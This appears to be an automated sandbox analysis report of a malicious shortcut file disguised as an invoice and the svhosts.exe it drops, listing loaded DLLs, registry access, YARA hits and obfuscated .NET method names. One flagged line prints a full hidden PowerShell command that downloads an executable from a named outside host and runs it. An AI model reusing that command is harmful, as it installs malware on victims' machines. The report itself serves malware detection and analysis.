                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Inovice_3_ETH.lnkLNK file: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Binary string: costura.dotnetzip.pdb.compressed source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: costura.dotnetzip.pdb.compressed source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: svhosts.exe, 00000002.00000002.2290132290.000000001C350000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: costura.dotnetzip.pdb.compressed8 source: svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, cLxg1VivqXKPVdAKiHb.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, RdxPeP7Eax71XOM6ZsE.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    .NET source code contains potential unpacker
                    Source: 2.2.svhosts.exe.f70000.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 2.2.svhosts.exe.f70000.1.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 2.2.svhosts.exe.f70000.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 2.2.svhosts.exe.f70000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 2.2.svhosts.exe.f70000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, BvK8wPBQakvfJfnIbN.cs.Net Code: OUtql2FQC4 System.Reflection.Assembly.Load(byte[])
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                    Suspicious powershell command line found
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://fermazapoved.ru/images/sys.exe','C:\Users\user\AppData\Roaming\svhosts.exe');Start-Process 'C:\Users\user\AppData\Roaming\svhosts.exe'
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 2.2.svhosts.exe.fd0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svhosts.exe.1b280000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2067785237.0000000000FD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2265623390.000000001B280000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: svhosts.exe PID: 7548, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9B8A77E4 push eax; retf 2_2_00007FFD9B8A77E5
                    Source: C:\Users\user\AppData\Roaming\svhosts.exeCode function: 2_2_00007FFD9B8A7D8E push ebx; retf 2_2_00007FFD9B8A7D94
                    Source: svhosts.exe.0.drStatic PE information: section name: .text entropy: 7.99673459109272
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, fjjqGO0hvSRjxJxcUeI.csHigh entropy of concatenated method names: 'AF20x1YmIB', 'wsZ0taVnKm', 'xbH0J6RXP7', 'Y4t0W2AgSG', 'S1H0L2l8pg', 'Rpc0EiHn6i7klJ8lFk3', 'SoMMBJHCqZdWefTJ1ai', 'xO9sKqHEj0qoaUwVNWw', 'zSe0NdHN0VMTUoFnRKK', 'EG9CmjH7QVioNuFmcHO'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, c76rLuc1OPxJNrkrpt4.csHigh entropy of concatenated method names: 'keAcv8DI2S', 'VJqcrmNP4P', 'v2XcoWpK4C', 'F67cpAE39U', 'ln9cQ6AqHt', 'Lmtc8nNuvd', 'zrfrcPVQITEYEwYMurR', 'CIU0Q3V86qxuaXBOkGa', 'g8HtwVVSy0O1gIBscMM', 'OLYwydVHFE15H7ikuPF'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, KVctFT4fKsCBP9YdbF1.csHigh entropy of concatenated method names: 'VDkO2KEDY9', 'Mrey0BSyl0KUPrCEJqR', 'PQMykiSmea7nKZnd3nc', 'Os0OleVK2y', 'zXsOqPFu4b', 'mhsO5SYJK6', 'PM3OAqAXns', 'S9YOGrF8oZ', 'etoOXNM2fw', 'PI6OaY2a1V'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, LWicU8cUFDjquI2bNSm.csHigh entropy of concatenated method names: 'i8jctrmqyh', 'cAccJfZV5e', 'I4ecWd2eAv', 'mR7cL8Mq3f', 'G9W0SRVEIAydilT8RWH', 'CG028hVND7k2q7vm85T', 'Uj3oQMV928muJGp9AfO', 'DYvHcAVBYEVFy0AesqZ', 'RnwQ4fVnUnZrVadaGFi', 'b9g7G0VCOmfur5CYTPx'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, capBNy2GiHYRX4XiCVP.csHigh entropy of concatenated method names: 'atc2ab3cZA', 'F3A2kQSAkO', 'c3H22PYfPM', 'hgn6E4QRQb9J5k3WDBL', 'VRyBJGQyEUGsB5N4iIj', 'ei7qGdQmpRElcGIMXyg', 'jiws5fQgYujAI40bmHG', 'R1PtvqQikPAlI0J663o'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, QTS7vvOYTtKRPZYqZ6A.csHigh entropy of concatenated method names: 'aKrOb2ldHD', 'VRuORfiiCU', 'gTJOyHBlAl', 'B7rOmrQ58V', 'peCOgFoTOf', 'Fy5OiqAhlq', 'iAhBbhSoFBIwQ7eZvg8', 'beWHlLSpAlnW63Hhc1V', 'eL5XI1SQOTQufbpSnT7', 'jEgcWMS81YvkK30nWyT'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, qweCvpqeoUr8cKH2XNm.csHigh entropy of concatenated method names: 'IhbqUwoVHD', 'YgO0xmvB33tAr3oxLHT', 'bdQEjZvLlbbgsBL46Iy', 'Q1jauOv9nWJWb6OpFaP', 'nVbtZsvEqp1OKu7H4XX', 'O6UpefvNJCIarRdkNfp'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, Y6eVC24FQ8H9gXRSZrT.csHigh entropy of concatenated method names: 'nvc4rsFRKL', 'HYqqif8VFHW7pJrpKCk', 'tuqhaI8PVdl2Tp3PTAa', 'H549e78jwTcjhtE1xd3', 'XgE1x98I5MwKQeHup3Z', 'jqXbHd8M7QUoyB2rgKY'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, GADkTJGjt66Zhh45eWP.csHigh entropy of concatenated method names: 'vhYGMaoZlQ', 'DCjGdVI5Ou', 'CDeGuqTbTc', 'LsdGeaKurB', 'gvRGh3utUS', 'uf5GUReBLu', 'e5UGx63nGa', 'ia0GtkAfL6', 'mcyGJqOQFy', 'oBeGW3k25q'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, lsLDSyAHWOyIGYCoPFq.csHigh entropy of concatenated method names: 'Mi1AVIkNUd', 'Cn4APaFTI5', 'IbEAjZRtid', 'Sj0AIIcF6m', 'W80AMsZy7P', 'SohAd3X2NR', 'DBtAuIHTRd', 'MRgtBYoFTWyoZcwpJbv', 'aYbZwJovwV99W5Jp7Xk', 'AAnWt6orjFoOvdE76sK'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, dHooNxRvjakWUVogZLS.csHigh entropy of concatenated method names: 'VFaRoK7FOQ', 'a9GRpELIJ7', 'sRUrMWjoKq5LXS12hdj', 'i6GNZRjpYr1uhriVWJx', 'CO6RI6jQ7NTYtB4RRqI', 'n84FpNjvxa4XHurbLIc', 'PnyAnsjr4juUyJhhNTP', 'pxsLT0j8glPdfa3EeCE'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, gQEQoo2VcsIuCsZJLev.csHigh entropy of concatenated method names: 'PjK2jQmhWI', 'vvr2IwBejI', 'CMK2MaSywn', 'XZN2doM9bc', 'svC2u3T3ds', 'r8X2eixIVy', 'hb42hIvCCO', 'ddo2UQisur', 'rU22xhdFkl', 'aSJ2ty6ZCQ'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, sG4wt3YlZNNtpsfVAHe.csHigh entropy of concatenated method names: 'wTsYayCV7O', 'dPlYkYtZwb', 'S2EY23V3Zw', 'kRgYKAa4K5', 'zSCY4eUUMc', 'apW4E0P01TCE10leSTd', 'e7tOeNP3WgHvQ6cIQC4', 'sw1Y5pN8dE', 'GL1YAqxEOM', 'NJvYGkVPwM'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, RQaSWVOoOVrpvJ7k2mi.csHigh entropy of concatenated method names: 'oEoOQGnUGx', 'JZpO8e2Zc2', 'NsCOSNgHBr', 'a78OHgXYGZ', 'tTROD1NmCe', 'z60OVAsa8D', 'EGJj4rSd88ge2fwqxeN', 'ebwo1WSuD2Es4xAkS3o', 'uH9Bs5Se4PdZ5rHy5Bv', 'oeksrDShdoLlqmqaalr'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, BvK8wPBQakvfJfnIbN.csHigh entropy of concatenated method names: 'F11NuHd5K', 'uSenOUUWP', 'C9DCxVlsp', 'Qq47TaSfr', 'Vq9fsKi2q', 'skwzYHmMj', 'OUtql2FQC4', 'jLjqqiHC5t', 'Nqyq5jxaxX', 'Y9KURtvZcSB4OPWRhtp'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, brNUMWZI1ElyPmCgnRu.csHigh entropy of concatenated method names: 'i1GZdH0Avl', 'dqnC2bDfGtBT4BE99uu', 'YcJJ7eDzTcAw8h9LEdZ', 'JjZjU5VldrRIBMSuhCo', 'PZ01fOVqkafjy3O2wlv', 'HBk1lHV5t8YNkFfiKKk', 'TGxnAVVA4S5GyGBbThG'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, IrLmSMG0fWWgKF2TQDw.csHigh entropy of concatenated method names: 'opRGs3jyJv', 'iDAqBhplRSoH1TYDnLj', 'bJrh4spqk8AnstK7WcS', 'svcdcqof1Bo7kSJUK0M', 'es1ZYmozgwgiZJ1w3eb', 'j7QIOgp5lFpNwXXkVvn'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, RnY12TA5klXPLyiySWo.csHigh entropy of concatenated method names: 'beqAGma09m', 'eZ7OHJrUQ9CjlHskXuA', 'AOHyn8rxiuTc1VL3V6B', 'uk5ICRrtpO1ggnvZBQJ', 'hqFfMZrJ5cywgZNg8nu', 'd1d0JlrWMyAfNcLOntG'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, wpDAL1bFuWcemcdRqgf.csHigh entropy of concatenated method names: 'Dispose', 'i9sQ4xPLcpWsW1xeLRR', 'fRcMgkP9iaql0yVLpAA', 'hi0vKPPJqVtCrakcvFA', 'ktf2FjPWyNYn5gD3Znv', 'aAEqCjPBDkEnComCrNU', 'Fcr5rvP750hR2NqcMIu', 'K440g9Pf89ixy2w0RxY', 'XjsoV6jlQSq2cX13C14', 'bp5wpljqVN9ML7GMRAb'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, uycrb3qxQqQjSqdftZo.csHigh entropy of concatenated method names: 'XvHqNM8i4m', 'xkoskJrAuc4kQLMGMVj', 'qtn4sNrGS1gLLhIx9dm', 'bgrGX5rXHYrZB96kHEG', 'wmBqCda7RA', 'uqwq7y98uN', 'G0f6YgrkCiugKys1GG4', 'QvWUEpr2cg1jZ5Xr2wf', 'BFCfCsrK3L0NB4JXkoG', 'jnS5qmcacK'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, EjD3KIZhYgXxF43EgY5.csHigh entropy of concatenated method names: 'qEbZnAs6M4', 'GvKZCIodE8', 'ExcZ7EQK3l', 'mHJZf8yhkC', 'ctxZztLcjd', 'daPclw0mhE', 'pBHcqNFDfp', 'njbc5mJeQq', 'WWjcAgsXxA', 'jAycG17NjV'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, cLxg1VivqXKPVdAKiHb.csHigh entropy of concatenated method names: 'imhGt1I1Im3ufkwam41', 'PlTJGYIFh6TVNxujhVr', 'nLE1lFTMhl', 'BsqWOhIpECspVDi6fCq', 'OBfv2cIQtBukdT01ZJv', 'aukMsnI8EdPArDyUrvM', 'eMrp0sISmRmTMgBsk7y', 'g38PJ8K3c0', 'MAI1kVyT98', 'tir12s4ZQk'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, qXwNvgTDO5S0rFRG02E.csHigh entropy of concatenated method names: 'k5MTPTwBYj', 'trmTjIt6bc', 'AGEYk1H5N0i5J63YLqk', 'qumGAWHALTl1Mxp8nvB', 'FsoKxMHGg9OFwmdSFZ9', 'IatPhFHXwcyKWv9NbQV'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, w5VySpAKsAdWEyeyh1L.csHigh entropy of concatenated method names: 'vrcAgrkF6Y', 'DdH7oroAx4Ppccson9c', 'W2KNUQoGHhDJSw0KUJi', 'Ne3LyQoXnxIgvZ99OUN', 'BeyAOeJyrt', 'ABxATHyJRj', 'xqGA0krbeu', 'SaeA3l4aub', 'dTxAsIYxYy', 'h4vAZjAJma'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, TkyIPcTNhQ8Ovm9sZYS.csHigh entropy of concatenated method names: 'Dispose', 'y9YgafHQpjmGKFNspOe', 'rFiEGxHo4W1nhuEmSKM', 'WbvFqeHphbXrEhLNFjq', 'Paf2rfH81MWd0rpiu2m', 'I4MWZcHSGJqpw4VopnR', 'l6bXxBHjILZdecy1MRE', 'IqjBObHIU0jeo61ejhY', 'uVFwmIHdLT8Q2hEDn2l', 'n4BRSGHukFJU70Jl5Ph'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, EyUmHpZDAWAhWQsv4H.csHigh entropy of concatenated method names: 'kTTYgxC8A', 'hIxwQiU4H', 'p1ubTB1J5', 'aFXRLhwMe', 'i1YymCTq4', 'acqmXkc9w', 'tyygjXBgU', 'PWDiBxGL4', 'MisQgdFL5SrD4rj9naF', 'snv6vqF92g7BFBUM994'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, bydUEn1gUAnWL8Sm347.csHigh entropy of concatenated method names: 'oNX1HjqGxN', 'AYT1DJ7UPw', 'YMX1VstA8C', 'gBK1PBi2rO', 'rIQ1jGPqD2', 'vlq1I91W2f', 'gco1MENaQu', 'nyc1d7U8sY', 'ELc1uYyGYB', 'YvC1ePxDVd'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, ixlaSY2QcGIF0ZrQ9oo.csHigh entropy of concatenated method names: 'JaZ2SO2X7e', 'WAH4FmQ9joH5YHsHG7j', 'B8QnH2QBjbAoAjWMuvZ', 'w07JPvQELkVWdYsBoAv', 'm9kGYWQNkEuHC1SB86v', 'B1jMFcQnh6KA3va8YTx', 'R2N8iqQCssag00ptMpB', 'pW7Z4CQ7j6ILKNdcxji', 'PSLlQ3QfJP7EICD4dhK', 'Wohc4rQzH0OaPEfc2qh'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, WlMuBdkKbKfnmwLWtGp.csHigh entropy of concatenated method names: 'me1k12vXlD', 'NyBkFaulHD', 'SFDkvrRDRh', 'yPmkr33ZVp', 'mYckoq9URi', 'OaTkpZvcAj', 'c3tkQA5Z2D', 'n7rm1AQq83T7ss7mQYp', 'fLy9ctQ5F0ouCqWBvw3', 'xZAkOUFnA0'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, jUitfU32YZ4hZJ2eSoH.csHigh entropy of concatenated method names: 'NyqYwND3lVsYr1ku6Jf', 'EOxSXkDTlWomfSjLLyH', 'vpsi7WD0npQ7kgL9ZY9', 'xNP3b6undG', 'blgna1DZY8oX1kt9YAR', 'fuRI3dDctJUsIyacGdw', 'KRc3gNchLj', 'd6cn9DDwJ6jN1ahg4nN', 'IwLYktDbSOvQmRfuP09', 'utxMWADRAf3NeZD23CO'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, IBj3d7ZpmxOtqvjDy0U.csHigh entropy of concatenated method names: 'OPuZ8hvP8C', 'qAMZSXaPH7', 'cmgZHvrxis', 'sQcZDccxrV', 'aAOZV924k8', 'niEcnPDLFoYJUZXmZso', 'gbI44LD9Tj3ycnZABaH', 'sFer3nDBefsvHbAv7g2', 'vuSW3ZDEJsrpaLXyr7c', 'wWCXpTDNsR1y1Utn1cs'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, YJAGZ7icGnV2a4pdkrT.csHigh entropy of concatenated method names: 'TeyiwiH278', 'Xh0ibgLdmI', 'voSiR1XnEu', 'Rhtiy2wAIx', 'i2Kimce972', 't3OFepIXEm1CLjZofvn', 'yOab3jIaZnLuGdpUIJe', 'ebAkkQIk2goJ00IEAv5', 'aSEF3wI2Bcsi6UiDwrf', 'nhbGxnIKQ8xpn1cCxmQ'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, p2HRsp3Q0I4hnP6bNEB.csHigh entropy of concatenated method names: 'ifm3SANe8l', 'YVd3Hl8yrl', 'M2B3DQ82pX', 'K2orncDofFyK7VBiahG', 'jZaVOKDvkTunX7h5ATK', 'qgh8bDDrI2MCYGrbiZP', 'MvowXDDpkrnp48uws3F', 'DIoCS0DQHopsrKnPt7Y', 'snt9wZD8cAPxqsh4YWa'
                    Source: 2.2.svhosts.exe.1bd80000.5.raw.unpack, vwocD72mPkO9LGGkJbE.csHigh entropy of concatenated method names: 'F3Z21O50Sg', 'FcFWKBQutD8RLLVMWxm', 'BvCB46Qe6DjYxoMpT5H', 'KRNgELQhVThLQRkxZNG', 'UqphZiQUHIp4dmUrgex', 'nuGoWJQx9q29reswBlS', 'SUS2iW3sqK', 'MVx9dCQPUC31sYpl6LZ', 'cfq1jmQjnMXJBxOyhB2', 'uti2l7QIOKWqRmJ7c0H'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, K1RuCWMqEInwVmF6E2.csHigh entropy of concatenated method names: 'c0FRS1419', 'mWRhaBDKE', 'i3lq2hgB7', 'uhPjwud8n', 'RGh0XQ3hplGH70Hxnbn', 'gu1li63rw0SSKrV7IZZ', 'G0Rk0u3RdT7VK7jE1Bp', 'JTcTI03qJT1TEMNsGdY', 'm3LZPs3j8cyvgMmIlaY', 'LVciuG3oklY5YecZEQU'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'gW0Me2yPerv8aYcPDAW'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, RdxPeP7Eax71XOM6ZsE.csHigh entropy of concatenated method names: 'VCcU7ThMu8hAbvao7e7', 'ELHe9whrj0QsOKwmxHN', 'fKtajy9vQ9', 'hxTVI3hjm0OlJFQMIYX', 'Q21BKehoXbLkjXVqHGw', 'm4O3fkhTvhSOywBoZQU', 'xV5KJThnnmyZqoGksqA', 'libJtPhVeMJcjsVvlrE', 'LpDOZDhpxSGBhVDAW36', 'XJsGLOhDUqCs1164Qhr'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, MJgK49WqHAoRPjJFa0.csHigh entropy of concatenated method names: 'AMZ2Ekyr4', 'zkZ0IL7Lg', 'S8Jwn4ZB3', 'O22Sb2D4e', 'alE1NdN5r', 'JGuIkk2po', 's7dU6C3IciZRQ9Iyo6G', 'xF59I13lBPpQCUtEnQs', 'XTLkS53E8L30K8Mhi8M', 'oYxS9Q3ScQNgsu2Fy0R'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, aU1uiha16ZVCy9l7kEd.csHigh entropy of concatenated method names: 'zbVBJDAuiJ', 'eO7BYE82LL', 'Tl2BvDBDUx', 'ChSB7T2aZ8', 'fdpBOglr0U', 'lZqBajiATC', 'nvBBBQnDdf', 'ByKBAHSUWr', 'WAyBCHo4G1', 'gSpBiSL3D1'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, sjnMkUl12Z4g6BMnTa.csHigh entropy of concatenated method names: 'A2rPgRfji', 'MfdzXp2Cu', 'egb4XhuEZb', 'HiV44lVaCp', 'PxE4KvY70y', 'WIn4fZXDWr', 'IvB4dyXFlf', 'zWA4mU80VG', 'tFZ4J6xIt3', 'lOY4YtYeBH'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, HGYJHk7SXi7wQrUMU1u.csHigh entropy of concatenated method names: 'HfipGwGAyb', 'TF4cmlhs9rpZTIChf9G', 'ktDHNlhF04qg3704wZx', 'JygBlPhH3GqaoLGjfxD', 'BGMdo1htNG1Eaqv9y8p', 'avxsAwhbkYLp1aLCv34', 'lIYp7nhGboeJAVBDHmi', 'sMKkWmh5KscBO44BeOn'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, CuP3rpoBx9ERdgnwOh.csHigh entropy of concatenated method names: 'zjfnwJLOj', 'P3nVVIqs9', 'AsfpkawBs', 'SPVDSMVBA', 'l0dQpu8hX', 'KbCLZS3oP', 'd0NUeu3fa', 'PchkmAEs1', 'cHUSbA3npB1jYqJuGck', 'FJUMIV3VxGluTFceIKY'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, RUyZge7gYG34YLmgatn.csHigh entropy of concatenated method names: 'lS97xRSAHk', 'uyo762oOY4', 'zN5v4gRwueEwtlVon70', 'NFUaahRS1yaI5Dg1vxP', 'X9HLpqR1q5q7sEqkQSV', 'waGEupRIxmXLXQZi5iV', 'UgAa5TRlGC2PVRWt3pV', 'Mn4YU1REZrBPyOndacX', 'o7w9yXRPrXs4uO0ol3I', 'bo2M3dRzDO4CBe4O464'
                    Source: 2.2.svhosts.exe.1b170000.3.raw.unpack, lDAWXR7hPZGrUF5br5l.csHigh entropy of concatenated method names: 'TNZ7jw33GY', 'AH57o0jd5V', 'Ymh7T1kRV5', 'zAP7nFNpMY', 'aix7Vw2fVL', 'OYhESwRAxk79NDLLYbg', 'tNJPyBRCxMniaSGIUbE', 'pXMB9rRib2KH4yKKLT6', 'B9fXxYRbo1B6wq2jGZv', 'jZoxpvRGk5FUnnb9fXU'
